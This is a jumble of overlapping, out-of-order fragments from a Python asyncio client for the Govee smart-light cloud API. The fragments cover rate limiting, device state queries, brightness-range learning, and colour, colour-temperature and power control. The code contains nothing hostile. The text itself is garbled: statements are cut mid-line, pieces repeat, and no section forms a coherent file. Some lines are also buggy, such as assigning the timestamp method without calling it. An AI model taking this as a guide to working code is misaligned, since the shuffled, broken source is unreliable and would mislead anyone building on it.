result.error =", "if changed: await self._learning_storage._write_cached(learning_infos) async def set_color_temp( self, device: Union[str, GoveeDevice], color_temp: int", "100 / 254)) brightness_result_100 = math.ceil(brightness_set_100 * 254 / 100) if device.learned_set_brightness_max ==", "learning_info.set_brightness_max learned_get_brightness_max = learning_info.get_brightness_max before_set_brightness_turn_on = learning_info.before_set_brightness_turn_on config_offline_is_off = learning_info.config_offline_is_off # create device", "from API: {json_obj}, resulting state object: {result}\" ) else: errText = await response.text()", "True elif \"powerState\" in prop: prop_power_state = prop[\"powerState\"] == \"on\" elif \"brightness\" in", "are finished with the Client without using an async context manager.\"\"\" await self.__aexit__()", "a device, return success and error message.\"\"\" return await self._turn(device, \"on\") async def", "unknown.\"\"\" class Govee(object): \"\"\"Govee API client.\"\"\" async def __aenter__(self): \"\"\"Async context manager enter.\"\"\"", "int timestamp: int source: str error: str lock_set_until: int lock_get_until: int learned_set_brightness_max: int", "is locked for {seconds_locked} seconds. Command waiting: {cmd}\") await asyncio.sleep(seconds_locked) json = {\"device\":", "Request headers with/without authentication.\"\"\" if auth: return {\"Govee-API-Key\": self._api_key} return {} @asynccontextmanager async", "aiohttp.ClientError as ex: # we are offline self._set_online(False) err = \"error from aiohttp:", "brightness as 0..254 brightness_set = brightness brightness_result = brightness_set brightness_set_100 = 0 if", "\"powerState\" in prop: prop_power_state = prop[\"powerState\"] == \"on\" elif \"brightness\" in prop: prop_brightness", "< 1: raise GoveeError(f\"Rate limiter threshold {val} must be above 1\") self._rate_limit_on =", "in device.support_cmds: err = f\"Command {command} not possible on device {device.device}\" _LOGGER.warning(f\"control {device_str}", "= self._get_lock_seconds(device.lock_get_until) if not device: err = f\"Invalid device {device_str}\" elif not device.retrievable:", "\"learned device %s uses range 0-%s for getting brightness state.\", device.device, device.learned_get_brightness_max, )", "\"\"\" success = False err = None device_str, device = self._get_device(device) if not", "0, 0) prop_color_temp = 0 for prop in json_obj[\"data\"][\"properties\"]: # somehow these are", "element if \"online\" in prop: prop_online = prop[\"online\"] is True elif \"powerState\" in", "for n seconds after controlling the device DELAY_GET_FOLLOWING_SET_SECONDS = 2 # do not", "brightness_set_100 = max(1, math.floor(brightness * 100 / 254)) brightness_result_100 = math.ceil(brightness_set_100 * 254", "%s\" % repr(ex) except Exception as ex: err = \"unknown error: %s\" %", "self._online = True # assume we are online self.events = Events() self._api_key =", "close when your are finished with the Client without using an async context", "val < 1: raise GoveeError(f\"Rate limiter threshold {val} must be above 1\") self._rate_limit_on", "or color_temp > 9000: err = f\"set_color_temp: invalid value {color_temp}, allowed range 2000-9000\"", "__init__( self, api_key: str, *, learning_storage: Optional[GoveeAbstractLearningStorage] = None, ): \"\"\"Init with an", "device.device ].set_brightness_max = device.learned_set_brightness_max changed = True if ( learning_infos[device.device].get_brightness_max != device.learned_get_brightness_max ):", "False config_offline_is_off = False # effenctive state # defaults by some conditions if", "5 # safe available call count for multiple processes self._limit = 100 self._limit_remaining", "doesn't match the actual brightness pull the brightness up to max once.\", device.device,", "color_temp > 9000: err = f\"set_color_temp: invalid value {color_temp}, allowed range 2000-9000\" else:", "else: _LOGGER.debug(f\"unknown state property '{prop}'\") if not prop_online: if self.config_offline_is_off is not None:", "= self._get_device(device) result = None err = None seconds_locked = self._get_lock_seconds(device.lock_get_until) if not", "math.floor(brightness * 100 / 254)) brightness_result_100 = math.ceil(brightness_set_100 * 254 / 100) if", "by turn_on and turn_off.\"\"\" success = False err = None device_str, device =", "= device if isinstance(device, GoveeDevice): device_str = device.device if not device_str in self._devices:", "state for one specific device.\"\"\" device_str, device = self._get_device(device) result = None err", "result = None err = None seconds_locked = self._get_lock_seconds(device.lock_get_until) if not device: err", "maximum number of requests you're permitted to make per minute. _RATELIMIT_REMAINING = \"Rate-Limit-Remaining\"", "self._rate_limit_on @rate_limit_on.setter def rate_limit_on(self, val): \"\"\"Set the remaining calls that trigger rate limiting.\"\"\"", "when your are finished with the Client without using an async context manager.\"\"\"", "await self._learning_storage._write_cached(learning_infos) async def set_color_temp( self, device: Union[str, GoveeDevice], color_temp: int ) ->", "( prop[\"color\"][\"r\"], prop[\"color\"][\"g\"], prop[\"color\"][\"b\"], ) elif \"colorTemInKelvin\" in prop: prop_color_temp = prop[\"colorTemInKelvin\"] else:", "prop[\"color\"][\"r\"], prop[\"color\"][\"g\"], prop[\"color\"][\"b\"], ) elif \"colorTemInKelvin\" in prop: prop_color_temp = prop[\"colorTemInKelvin\"] else: _LOGGER.debug(f\"unknown", "str]: \"\"\"Turn off a device, return success and error message.\"\"\" return await self._turn(device,", ") else: errText = await response.text() err = f\"API-Error {response.status}: {errText}\" return result,", "device.learned_get_brightness_max == 100: # scale range 0-100 up to 0-254 prop_brightness = math.floor(", "True: seconds_locked = self._get_lock_seconds(device.lock_set_until) if not seconds_locked: break; _LOGGER.debug(f\"control {device_str} is locked for", "= await response.text() err = f\"API-Error {response.status}: {result}\" return ping_ok_delay, err async def", "self.rate_limit_remaining <= self.rate_limit_on: # do we need to sleep? sleep_sec = self.rate_limit_reset_seconds if", "calls. This also handles: - rate-limiting - online/offline status \"\"\" err = None", "# safe available call count for multiple processes self._limit = 100 self._limit_remaining =", "url: str, params=None): \"\"\"API HTTP Get call.\"\"\" async with self._api_request_internal( lambda: self._session.get( url=url,", "to get utc now as seconds.\"\"\" return datetime.timestamp(datetime.now()) def _track_rate_limit(self, response): \"\"\"Track rate", "\"\"\"Set color (r, g, b) where each value may be in range 0-255", "if device.learned_get_brightness_max == 100: # scale range 0-100 up to 0-254 prop_brightness =", "utilize the govee API\" ) limit_unknown = True if ( _RATELIMIT_TOTAL in response.headers", "aiohttp result checks if it is a success result.\"\"\" return \"message\" in result", "class GoveeError(Exception): \"\"\"Base Exception thrown from govee_api_laggat.\"\"\" class GoveeDeviceNotFound(GoveeError): \"\"\"Device is unknown.\"\"\" class", "value {color}, green must be within 0 .. 254\" elif blue < 0", "= GoveeAbstractLearningStorage() @classmethod async def create( cls, api_key: str, *, learning_storage: Optional[GoveeAbstractLearningStorage] =", "for other clients. \"\"\" return self._rate_limit_on @rate_limit_on.setter def rate_limit_on(self, val): \"\"\"Set the remaining", "= color[0] green = color[1] blue = color[2] if red < 0 or", "self._devices[device_str].source = \"history\" self._devices[device_str].color = color return success, err def _get_lock_seconds(self, utcSeconds: int)", "*err): \"\"\"Async context manager exit.\"\"\" if self._session: await self._session.close() self._session = None def", "= self._utcnow() learning_infos = await self._learning_storage._read_cached() for item in result[\"data\"][\"devices\"]: device_str = item[\"device\"]", "is_retrievable = item[\"retrievable\"] # assuming defaults for learned/configured values learned_set_brightness_max = None learned_get_brightness_max", "# Unsupported Cmd Value # set brightness as 0..100 as 0..254 didn't work", "err: success = self._is_success_result_message(result) if success: self._devices[device_str].timestamp = self._utcnow self._devices[device_str].source = \"history\" self._devices[device_str].color", "GoveeDevice]) -> Tuple[bool, str]: \"\"\"Turn off a device, return success and error message.\"\"\"", "Union[str, GoveeDevice], onOff: str ) -> Tuple[bool, str]: \"\"\"Turn command called by turn_on", "- rate-limiting - online/offline status \"\"\" err = None await self.rate_limit_delay() try: async", "0 .. 254\" else: if brightness > 0 and device.before_set_brightness_turn_on: await self.turn_on(device) #", "= self._devices[device_str] result.online = prop_online result.power_state = prop_power_state result.brightness = prop_brightness result.color =", "bool support_cmds: List[str] support_turn: bool support_brightness: bool support_color: bool support_color_tem: bool online: bool", "or red > 255: err = ( f\"set_color: invalid value {color}, red must", "self._devices[device_str].error = err else: self._devices[device_str] = state self._devices[device_str].error = None return self.devices async", "onOff: str ) -> Tuple[bool, str]: \"\"\"Turn command called by turn_on and turn_off.\"\"\"", "> 100: device.learned_get_brightness_max = 254 await self._learn(device) if device.learned_get_brightness_max == 100: # scale", "total: {self._limit}, remaining: {self._limit_remaining} in {self.rate_limit_reset_seconds} seconds\" ) limit_unknown = False except Exception", "if val < 1: raise GoveeError(f\"Rate limiter threshold {val} must be above 1\")", "GoveeDevice], color_temp: int ) -> Tuple[bool, str]: \"\"\"Set color temperature to 2000-9000.\"\"\" success", "= utcSeconds - self._utcnow() if seconds_lock < 0: seconds_lock = 0 return seconds_lock", "support_turn=\"turn\" in item[\"supportCmds\"], support_brightness=\"brightness\" in item[\"supportCmds\"], support_color=\"color\" in item[\"supportCmds\"], support_color_tem=\"colorTem\" in item[\"supportCmds\"], #", "err = f\"Invalid device {device_str}, {device}\" else: if len(color) != 3: err =", "as response: if response.status == 200: timestamp = self._utcnow() json_obj = await response.json()", "self.config_offline_is_off: prop_power_state = False elif device.config_offline_is_off: # learning option prop_power_state = False #", "err = None device_str, device = self._get_device(device) if not device: err = f\"Invalid", "\"brightness\" in prop: prop_brightness = prop[\"brightness\"] elif \"color\" in prop: prop_color = (", "err) def _utcnow(self): \"\"\"Helper method to get utc now as seconds.\"\"\" return datetime.timestamp(datetime.now())", "Client without an async context manager.\"\"\" self = Govee(api_key, learning_storage=learning_storage) await self.__aenter__() return", "def _track_rate_limit(self, response): \"\"\"Track rate limiting.\"\"\" if response.status == 429: _LOGGER.warning( f\"Rate limit", "context manager.\"\"\" await self.__aexit__() def _getHeaders(self, auth: bool): \"\"\"Return Request headers with/without authentication.\"\"\"", "err: # Unsupported Cmd Value # set brightness as 0..100 as 0..254 didn't", "ex: _LOGGER.warning(f\"Error trying to get rate limits: {ex}\") if limit_unknown: self._limit_remaining -= 1", "async def get_states(self) -> List[GoveeDevice]: \"\"\"Request states for all devices from API.\"\"\" _LOGGER.debug(\"get_states\")", "{self._limit_remaining} of {self._limit} remaining, sleeping for {sleep_sec}s.\" ) await asyncio.sleep(sleep_sec) @property def rate_limit_total(self):", "else: if not device.controllable: err = f\"Device {device.device} is not controllable\" _LOGGER.debug(f\"control {device_str}", "= 0 if brightness_set > 0: brightness_set_100 = max(1, math.floor(brightness * 100 /", "set brightness as 0..100 brightness_set = brightness_set_100 brightness_result = brightness_result_100 command = \"brightness\"", "= \"colorTem\" result, err = await self._control(device, command, color_temp) if not err: success", "== None or ( device.learned_get_brightness_max == 100 and prop_brightness > 100 ): device.learned_get_brightness_max", "count for multiple processes self._limit = 100 self._limit_remaining = 100 self._limit_reset = 0", "{sleep_sec}s.\" ) await asyncio.sleep(sleep_sec) @property def rate_limit_total(self): \"\"\"Rate limit is counted down from", "err = f\"Command {command} not possible on device {device.device}\" _LOGGER.warning(f\"control {device_str} not possible:", "get_states(self) -> List[GoveeDevice]: \"\"\"Request states for all devices from API.\"\"\" _LOGGER.debug(\"get_states\") for device_str", "params: Any ) -> Tuple[Any, str]: \"\"\"Control led strips and bulbs.\"\"\" device_str, device", "f\"Invalid device {device_str}, {device}\" else: command = \"turn\" params = onOff result, err", "{device.device} is not controllable\" _LOGGER.debug(f\"control {device_str} not possible: {err}\") elif not command in", "= GoveeLearnedInfo() # output what was lerned, and learn if ( learning_infos[device.device].set_brightness_max !=", "None: default, use config_offline_is_off from learning, or False by default. False: an offline", "# we just changed something, return state from history self._devices[device_str].source = \"history\" result", "online # inform about state change self.events.online(self._online) if not online: # show all", "Exception as ex: err = \"unknown error: %s\" % repr(ex) if err: class", "{seconds_locked} seconds. Command waiting: {cmd}\") await asyncio.sleep(seconds_locked) json = {\"device\": device.device, \"model\": device.model,", "\"on\") async def turn_off(self, device: Union[str, GoveeDevice]) -> Tuple[bool, str]: \"\"\"Turn off a", "command called by turn_on and turn_off.\"\"\" success = False err = None device_str,", "{device}\" else: if brightness < 0 or brightness > 254: err = f\"set_brightness:", ") if not err: device.learned_set_brightness_max = 100 await self._learn(device) else: if brightness_set >", "GoveeDevice], color: Tuple[int, int, int] ) -> Tuple[bool, str]: \"\"\"Set color (r, g,", "f\"Rate limiter threshold {val} must be below {self._limit}\" ) if val < 1:", "str]: \"\"\"Set brightness to 0-254.\"\"\" success = False err = None device_str, device", "response: self._set_online(True) # we got something, so we are online self._track_rate_limit(response) # return", "will need to re-learn every time again. self._learning_storage = GoveeAbstractLearningStorage() @classmethod async def", "call.\"\"\" async with self._api_request_internal( lambda: self._session.get( url=url, headers=self._getHeaders(auth), params=params ) ) as response:", "\"\"\"Get a device by address or GoveeDevice DTO. returns: device_address, device_dto \"\"\" device_str", "Tuple[int, int, int] ) -> Tuple[bool, str]: \"\"\"Set color (r, g, b) where", "device.model, \"cmd\": cmd} await self.rate_limit_delay() async with self._api_put( url=_API_DEVICES_CONTROL, json=json ) as response:", "_LOGGER.debug( f\"state returned from API: {json_obj}, resulting state object: {result}\" ) else: errText", "self, api_key: str, *, learning_storage: Optional[GoveeAbstractLearningStorage] = None, ): \"\"\"Init with an API_KEY", "err = f\"Invalid device {device_str}\" elif not device.retrievable: # device {device_str} isn't able", "prop_brightness > 100: device.learned_get_brightness_max = 254 await self._learn(device) if device.learned_get_brightness_max == 100: #", "{result}\" ) else: errText = await response.text() err = f\"API-Error {response.status}: {errText}\" return", "3: err = f\"set_color: invalid value {color}, must be tuple with (r, g,", "self.rate_limit_delay() async with self._api_put( url=_API_DEVICES_CONTROL, json=json ) as response: if response.status == 200:", "success and error message.\"\"\" return await self._turn(device, \"on\") async def turn_off(self, device: Union[str,", "return state from hisory for n seconds after controlling the device DELAY_GET_FOLLOWING_SET_SECONDS =", "checks if it is a success result.\"\"\" return \"message\" in result and result[\"message\"]", "limit.\"\"\" return self._limit_remaining @property def rate_limit_reset(self): \"\"\"UTC time in seconds when the rate", "err = await self._control(device, command, params) success = False if not err: success", "self._track_rate_limit(response) # return the async content manager response yield response except aiohttp.ClientError as", "device {device_str} isn't able to return state, return 'history' state self._devices[device_str].source = \"history\"", "brightness_set > 0: brightness_set_100 = max(1, math.floor(brightness * 100 / 254)) brightness_result_100 =", "{color}, green must be within 0 .. 254\" elif blue < 0 or", "sleep await asyncio.sleep(1) # set brightness as 0..254 brightness_set = brightness brightness_result =", "green, \"b\": blue} result, err = await self._control(device, command, command_color) if not err:", "power_state: bool brightness: int color: Tuple[int, int, int] color_temp: int timestamp: int source:", "Defaults to 5, which means there is some room for other clients. \"\"\"", "= False prop_color = (0, 0, 0) prop_color_temp = 0 for prop in", "= False # init Dict and entry for device if learning_infos == None:", "0-%s for getting brightness state.\", device.device, device.learned_get_brightness_max, ) if device.learned_get_brightness_max == 100: _LOGGER.info(", "max once.\", device.device, ) changed = True learning_infos[ device.device ].get_brightness_max = device.learned_get_brightness_max if", "self._devices[device_str] _LOGGER.debug( f\"state object returned from cache: {result}, next state for {device.device} from", "api_key: str, *, learning_storage: Optional[GoveeAbstractLearningStorage] = None, ): \"\"\"Init with an API_KEY and", "power state. True: an offline device is shown as off. \"\"\" self._config_offline_is_off =", "self._devices[device_str] else: raise GoveeDeviceNotFound(device_str) return device_str, device def _is_success_result_message(self, result) -> bool: \"\"\"Given", "self._set_online(True) # we got something, so we are online self._track_rate_limit(response) # return the", "url=_API_DEVICES_CONTROL, json=json ) as response: if response.status == 200: device.lock_set_until = ( self._utcnow()", "{\"device\": device.device, \"model\": device.model, \"cmd\": cmd} await self.rate_limit_delay() async with self._api_put( url=_API_DEVICES_CONTROL, json=json", "].get_brightness_max = device.learned_get_brightness_max if changed: await self._learning_storage._write_cached(learning_infos) async def set_color_temp( self, device: Union[str,", "_get_device(self, device: Union[str, GoveeDevice]) -> Tuple[str, GoveeDevice]: \"\"\"Get a device by address or", "self._utcnow() @property def rate_limit_on(self): \"\"\"Remaining calls that trigger rate limiting. Defaults to 5,", "= max(1, math.floor(brightness * 100 / 254)) brightness_result_100 = math.ceil(brightness_set_100 * 254 /", "elif not device.retrievable: # device {device_str} isn't able to return state, return 'history'", "url: str, json): \"\"\"API HTTP Put call.\"\"\" async with self._api_request_internal( lambda: self._session.put( url=url,", "rate_limit_total(self): \"\"\"Rate limit is counted down from this value.\"\"\" return self._limit @property def", "brightness as 0..100 as 0..254 didn't work brightness_set = brightness_set_100 brightness_result = brightness_result_100", "_API_BASE_URL + \"/v1/devices/control\" _API_DEVICES_STATE = _API_BASE_URL + \"/v1/devices/state\" # API rate limit header", "response: yield response @asynccontextmanager async def _api_get(self, *, auth=True, url: str, params=None): \"\"\"API", "rate limit will be reset.\"\"\" return self._limit_reset @property def rate_limit_reset_seconds(self): \"\"\"Seconds until the", "100 self._limit_remaining = 100 self._limit_reset = 0 self._config_offline_is_off = None self._learning_storage = learning_storage", "color_temp: int timestamp: int source: str error: str lock_set_until: int lock_get_until: int learned_set_brightness_max:", "# api doesn't work if we don't sleep await asyncio.sleep(1) # set brightness", "connection to API.\"\"\" try: # this will set self.online await self.ping() except: pass", "# defaults for state online=True, power_state=False, brightness=0, color=(0, 0, 0), color_temp=0, timestamp=timestamp, source=\"history\",", "self._get_device(device) if not device: err = f\"Invalid device {device_str}, {device}\" else: if len(color)", "\"\"\"Single device from cache.\"\"\" _, device = self._get_device(device) return device @property def online(self):", "await asyncio.sleep(seconds_locked) json = {\"device\": device.device, \"model\": device.model, \"cmd\": cmd} await self.rate_limit_delay() async", "= f\"set_color_temp: invalid value {color_temp}, allowed range 2000-9000\" else: command = \"colorTem\" result,", "change power state. True: an offline device is shown as off. \"\"\" self._config_offline_is_off", "device.learned_set_brightness_max ): _LOGGER.debug( \"learned device %s uses range 0-%s for setting brightness.\", device.device,", "\"model\": device.model} async with self._api_get(url=_API_DEVICES_STATE, params=params) as response: if response.status == 200: timestamp", "state.\", device.device, device.learned_get_brightness_max, ) if device.learned_get_brightness_max == 100: _LOGGER.info( \"brightness range for %s", "= \"unknown error: %s\" % repr(ex) if err: class error_response: def __init__(self, err_msg):", "_LOGGER.debug(f\"control {device_str} not possible: {err}\") elif not command in device.support_cmds: err = f\"Command", "# The maximum number of requests you're permitted to make per minute. _RATELIMIT_REMAINING", "learning_storage if not self._learning_storage: # use an internal learning storage as long as", "sleep_sec = self.rate_limit_reset_seconds if sleep_sec > 0: _LOGGER.warning( f\"Rate limiting active, {self._limit_remaining} of", "{val} must be below {self._limit}\" ) if val < 1: raise GoveeError(f\"Rate limiter", "response.text() err = f\"API-Error {response.status} on command {cmd}: {text} for device {device}\" _LOGGER.warning(f\"control", "False # autobrightness learning if device.learned_get_brightness_max == None or ( device.learned_get_brightness_max == 100", "self._devices[device_str].source = \"history\" self._devices[device_str].color_temp = color_temp return success, err async def set_color( self,", "\"turn\" params = onOff result, err = await self._control(device, command, params) success =", "color_temp=0, timestamp=timestamp, source=\"history\", error=None, lock_set_until=0, lock_get_until=0, learned_set_brightness_max=learned_set_brightness_max, learned_get_brightness_max=learned_get_brightness_max, before_set_brightness_turn_on=before_set_brightness_turn_on, config_offline_is_off=config_offline_is_off ) else: result", "changed: await self._learning_storage._write_cached(learning_infos) async def set_color_temp( self, device: Union[str, GoveeDevice], color_temp: int )", "async context manager.\"\"\" self = Govee(api_key, learning_storage=learning_storage) await self.__aenter__() return self async def", "we run. # we will need to re-learn every time again. self._learning_storage =", "getting state for device %s: %s\", device_str, err, ) self._devices[device_str].error = err else:", "DTO devices[device_str] = GoveeDevice( device=device_str, model=model_str, device_name=item[\"deviceName\"], controllable=item[\"controllable\"], retrievable=is_retrievable, support_cmds=item[\"supportCmds\"], support_turn=\"turn\" in item[\"supportCmds\"],", "self._devices[device_str].error = None return self.devices async def _get_device_state( self, device: Union[str, GoveeDevice] )", "if device.learned_get_brightness_max == 100: _LOGGER.info( \"brightness range for %s is assumed. If the", "params) success = False if not err: success = self._is_success_result_message(result) if success: self._devices[device_str].timestamp", "*, learning_storage: Optional[GoveeAbstractLearningStorage] = None, ): \"\"\"Use create method if you want to", "model_str = item[\"model\"] is_retrievable = item[\"retrievable\"] # assuming defaults for learned/configured values learned_set_brightness_max", "device: Union[str, GoveeDevice], color_temp: int ) -> Tuple[bool, str]: \"\"\"Set color temperature to", "as ex: # we are offline self._set_online(False) err = \"error from aiohttp: %s\"", "self.online await self.ping() except: pass return self.online async def ping(self) -> Tuple[float, str]:", "command, params) success = False if not err: success = self._is_success_result_message(result) if success:", "return success, err async def set_brightness( self, device: Union[str, GoveeDevice], brightness: int )", "if auth: return {\"Govee-API-Key\": self._api_key} return {} @asynccontextmanager async def _api_put(self, *, auth=True,", "self._session.put( url=url, headers=self._getHeaders(auth), json=json ) ) as response: yield response @asynccontextmanager async def", "in item[\"supportCmds\"], support_color=\"color\" in item[\"supportCmds\"], support_color_tem=\"colorTem\" in item[\"supportCmds\"], # defaults for state online=True,", "or brightness > 254: err = f\"set_brightness: invalid value {brightness}, allowed range 0", "self._config_offline_is_off @config_offline_is_off.setter def config_offline_is_off(self, val: bool): \"\"\" Set global behavour when device is", "devices also utilize the govee API\" ) limit_unknown = True if ( _RATELIMIT_TOTAL", "time.time() ping_ok_delay = None err = None async with self._api_get(url=_API_PING, auth=False) as response:", "n seconds after controlling the device DELAY_SET_FOLLOWING_SET_SECONDS = 1 @dataclass class GoveeDevice(object): \"\"\"", "100 self._limit_reset = 0 self._config_offline_is_off = None self._learning_storage = learning_storage if not self._learning_storage:", "delay) else: err = f\"API-Result wrong: {result}\" else: result = await response.text() err", "devices return self.devices, err def _get_device(self, device: Union[str, GoveeDevice]) -> Tuple[str, GoveeDevice]: \"\"\"Get", "it is a success result.\"\"\" return \"message\" in result and result[\"message\"] == \"Success\"", "utcSeconds: int) -> int: \"\"\"Get seconds to wait.\"\"\" seconds_lock = utcSeconds - self._utcnow()", "params = {\"device\": device.device, \"model\": device.model} async with self._api_get(url=_API_DEVICES_STATE, params=params) as response: if", "not controllable\" _LOGGER.debug(f\"control {device_str} not possible: {err}\") elif not command in device.support_cmds: err", "- online/offline status \"\"\" err = None await self.rate_limit_delay() try: async with request_lambda()", "return self._limit @property def rate_limit_remaining(self): \"\"\"Remaining Rate limit.\"\"\" return self._limit_remaining @property def rate_limit_reset(self):", "values\" else: red = color[0] green = color[1] blue = color[2] if red", "= {} if device.device not in learning_infos: learning_infos[device.device] = GoveeLearnedInfo() # output what", "in err: # Unsupported Cmd Value # set brightness as 0..100 as 0..254", "device) -> GoveeDevice: \"\"\"Single device from cache.\"\"\" _, device = self._get_device(device) return device", "brightness_set) if err: # try again with 0-100 range if \"API-Error 400\" in", "all dicts with one element if \"online\" in prop: prop_online = prop[\"online\"] is", "self._rate_limit_on = 5 # safe available call count for multiple processes self._limit =", "{response.status} on command {cmd}: {text} for device {device}\" _LOGGER.warning(f\"control {device_str} not possible: {err}\")", "# cache last get_devices result self._devices = devices return self.devices, err def _get_device(self,", "prop_color = (0, 0, 0) prop_color_temp = 0 for prop in json_obj[\"data\"][\"properties\"]: #", "% repr(ex) if err: class error_response: def __init__(self, err_msg): self._err_msg = err_msg status", "{ex}\") if limit_unknown: self._limit_remaining -= 1 async def rate_limit_delay(self): \"\"\"Delay a call when", "True # assume we are online self.events = Events() self._api_key = api_key self._devices", "multiple processes self._limit = 100 self._limit_remaining = 100 self._limit_reset = 0 self._config_offline_is_off =", "error=None, lock_set_until=0, lock_get_until=0, learned_set_brightness_max=learned_set_brightness_max, learned_get_brightness_max=learned_get_brightness_max, before_set_brightness_turn_on=before_set_brightness_turn_on, config_offline_is_off=config_offline_is_off ) else: result = await response.text()", "= Events() self._api_key = api_key self._devices = {} self._rate_limit_on = 5 # safe", "color: Tuple[int, int, int] color_temp: int timestamp: int source: str error: str lock_set_until:", "content manager response yield response except aiohttp.ClientError as ex: # we are offline", "self._utcnow() + DELAY_GET_FOLLOWING_SET_SECONDS ) result = await response.json() else: text = await response.text()", "if not self._learning_storage: # use an internal learning storage as long as we", "= True # assume we are online self.events = Events() self._api_key = api_key", "create method if you want to use this Client without an async context", "_LOGGER.debug(\"govee_api_laggat v%s\", VERSION) self._online = True # assume we are online self.events =", "* 254 / 100) if device.learned_set_brightness_max == 100: # set brightness as 0..100", "return state from history self._devices[device_str].source = \"history\" result = self._devices[device_str] _LOGGER.debug( f\"state object", "device.learned_set_brightness_max == 100: # set brightness as 0..100 brightness_set = brightness_set_100 brightness_result =", "None learned_get_brightness_max = None before_set_brightness_turn_on = False config_offline_is_off = False # effenctive state", "seconds\" ) limit_unknown = False except Exception as ex: _LOGGER.warning(f\"Error trying to get", "device: Union[str, GoveeDevice]) -> Tuple[bool, str]: \"\"\"Turn off a device, return success and", ") device.lock_get_until = ( self._utcnow() + DELAY_GET_FOLLOWING_SET_SECONDS ) result = await response.json() else:", "= f\"Invalid device {device_str}, {device}\" else: command = \"turn\" params = onOff result,", "and fire an event on change.\"\"\" if self._online != online: self._online = online", "class GoveeDeviceNotFound(GoveeError): \"\"\"Device is unknown.\"\"\" class Govee(object): \"\"\"Govee API client.\"\"\" async def __aenter__(self):", "*, auth=True, url: str, params=None): \"\"\"API HTTP Get call.\"\"\" async with self._api_request_internal( lambda:", "ex: err = \"unknown error: %s\" % repr(ex) if err: class error_response: def", "f\"set_brightness: invalid value {brightness}, allowed range 0 .. 254\" else: if brightness >", "f\"API-Error {response.status}: {result}\" # cache last get_devices result self._devices = devices return self.devices,", "for {seconds_locked} seconds. Command waiting: {cmd}\") await asyncio.sleep(seconds_locked) json = {\"device\": device.device, \"model\":", "async def get_devices(self) -> Tuple[List[GoveeDevice], str]: \"\"\"Get and cache devices.\"\"\" _LOGGER.debug(\"get_devices\") devices =", "self._devices[device_str].source = \"history\" self._devices[device_str].power_state = onOff == \"on\" return success, err async def", "we are online self.events = Events() self._api_key = api_key self._devices = {} self._rate_limit_on", "await self._control(device, command, brightness_set) if err: # try again with 0-100 range if", "): _LOGGER.debug( \"learned device %s uses range 0-%s for getting brightness state.\", device.device,", "= False # autobrightness learning if device.learned_get_brightness_max == None or ( device.learned_get_brightness_max ==", "device = self._get_device(device) result = None err = None seconds_locked = self._get_lock_seconds(device.lock_get_until) if", "return self.online async def ping(self) -> Tuple[float, str]: \"\"\"Ping the api endpoint. No", "off a device, return success and error message.\"\"\" return await self._turn(device, \"off\") async", "will set self.online await self.ping() except: pass return self.online async def ping(self) ->", "def set_brightness( self, device: Union[str, GoveeDevice], brightness: int ) -> Tuple[bool, str]: \"\"\"Set", "async context manager.\"\"\" await self.__aexit__() def _getHeaders(self, auth: bool): \"\"\"Return Request headers with/without", "\"\"\"Given an aiohttp result checks if it is a success result.\"\"\" return \"message\"", "if not device: err = f\"Invalid device {device_str}, {device}\" else: if brightness <", "device, command, brightness_set ) if not err: device.learned_set_brightness_max = 100 await self._learn(device) else:", "None _LOGGER.debug( f\"state returned from API: {json_obj}, resulting state object: {result}\" ) else:", "1 async def rate_limit_delay(self): \"\"\"Delay a call when rate limiting is active.\"\"\" #", "learning_infos = {} if device.device not in learning_infos: learning_infos[device.device] = GoveeLearnedInfo() # output", "self._set_online(False) err = \"error from aiohttp: %s\" % repr(ex) except Exception as ex:", "this will set self.online await self.ping() except: pass return self.online async def ping(self)", "device %s uses range 0-%s for setting brightness.\", device.device, device.learned_set_brightness_max, ) learning_infos[ device.device", "or False by default. False: an offline device doesn't change power state. True:", "range 0-100 up to 0-254 prop_brightness = math.floor( prop_brightness * 254 / 100", "success: self._devices[device_str].timestamp = self._utcnow self._devices[device_str].source = \"history\" self._devices[device_str].color = color return success, err", "for item in result[\"data\"][\"devices\"]: device_str = item[\"device\"] model_str = item[\"model\"] is_retrievable = item[\"retrievable\"]", "= prop[\"online\"] is True elif \"powerState\" in prop: prop_power_state = prop[\"powerState\"] == \"on\"", "learning_infos[device.device].get_brightness_max != device.learned_get_brightness_max ): _LOGGER.debug( \"learned device %s uses range 0-%s for getting", "False prop_power_state = False prop_brightness = False prop_color = (0, 0, 0) prop_color_temp", "device.learned_get_brightness_max if changed: await self._learning_storage._write_cached(learning_infos) async def set_color_temp( self, device: Union[str, GoveeDevice], color_temp:", "err: success = self._is_success_result_message(result) if success: self._devices[device_str].timestamp = self._utcnow self._devices[device_str].source = \"history\" self._devices[device_str].color_temp", "device: Union[str, GoveeDevice] ) -> Tuple[GoveeDevice, str]: \"\"\"Get state for one specific device.\"\"\"", "ping_ok_delay = max(1, delay) else: err = f\"API-Result wrong: {result}\" else: result =", "Union[str, GoveeDevice]) -> Tuple[str, GoveeDevice]: \"\"\"Get a device by address or GoveeDevice DTO.", "green must be within 0 .. 254\" elif blue < 0 or blue", "global behavour when device is offline. None: default, use config_offline_is_off from learning, or", "devices elif isinstance(device, str) and device_str in self._devices: device = self._devices[device_str] else: raise", "rate_limit_on(self): \"\"\"Remaining calls that trigger rate limiting. Defaults to 5, which means there", "def rate_limit_on(self): \"\"\"Remaining calls that trigger rate limiting. Defaults to 5, which means", "\"\"\"Get the global config option config_offline_is_off.\"\"\" return self._config_offline_is_off @config_offline_is_off.setter def config_offline_is_off(self, val: bool):", "= await self._control(device, command, color_temp) if not err: success = self._is_success_result_message(result) if success:", "async def close(self): \"\"\"Use close when your are finished with the Client without", "just changed something, return state from history self._devices[device_str].source = \"history\" result = self._devices[device_str]", "an aiohttp result checks if it is a success result.\"\"\" return \"message\" in", "def ping(self) -> Tuple[float, str]: \"\"\"Ping the api endpoint. No API_KEY is needed.\"\"\"", "an async context manager.\"\"\" self = Govee(api_key, learning_storage=learning_storage) await self.__aenter__() return self async", "= self._is_success_result_message(result) if success: self._devices[device_str].timestamp = self._utcnow self._devices[device_str].source = \"history\" self._devices[device_str].brightness = brightness_result", "\"\"\" Set global behavour when device is offline. None: default, use config_offline_is_off from", "if sleep_sec > 0: _LOGGER.warning( f\"Rate limiting active, {self._limit_remaining} of {self._limit} remaining, sleeping", "must be above 1\") self._rate_limit_on = val @property def config_offline_is_off(self): \"\"\"Get the global", "\"\"\"Last request was able to connect to the API.\"\"\" return self._online def _set_online(self,", "device.device, ) changed = True learning_infos[ device.device ].get_brightness_max = device.learned_get_brightness_max if changed: await", "= ( f\"set_color: invalid value {color}, red must be within 0 .. 254\"", "self._devices = {} self._rate_limit_on = 5 # safe available call count for multiple", "these are all dicts with one element if \"online\" in prop: 